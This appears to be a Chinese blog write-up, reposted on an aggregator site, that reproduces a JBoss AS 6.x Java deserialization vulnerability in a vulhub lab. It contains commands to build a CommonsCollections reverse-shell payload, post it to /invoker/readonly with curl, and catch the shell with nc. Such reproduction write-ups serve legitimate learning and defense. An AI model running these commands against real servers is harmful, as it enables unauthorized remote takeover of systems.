标签:ReverseShellCommonsCollectionsHashMap jboss xx 版本 new 2017 序列化
0x00 实验环境
攻击机:Win 10
靶场:docker拉的vulhub靶场
0x01 影响版本
实验版本jboss:as-6.1.0,对版本低于7.x的有影响,即:5.x和6.x版本
0x02 漏洞复现
(1)存在漏洞的页面:
http://x.x.x.x:8080/invoker/readonly
(2)说是这里存在反序列化,不太懂java代码,等以后学了这个再看看吧。
序列化: FileOutputStream fos = new FileOutputStream(file); ObjectOutputStream oos = new ObjectOutputStream(fos); oos.writeObject(st);
反序列化:
FileInputStream fis = new FileInputStream(file); ObjectInputStream ois = new ObjectInputStream(fis); Student st1 = (Student) ois.readObject();
(3)两种拿权限方式:
方式一:
直接使用现有的工具:
方式二:
使用反序列化:
(1)下载工具(工具一概不提供,本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。):
(2)生成一个ser的exp:
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:2333
(3)执行攻击:
curl http://xx.xx.xx.xx:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
(4)2333端口开启监听后将收到shell:
nc -lvp 2333
0x03 漏洞修复
1、升级jboss为7.x版本
标签:ReverseShellCommonsCollectionsHashMap,jboss,xx,版本,new,2017,序列化 来源: https://www.cnblogs.com/cute-puli/p/15237415.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。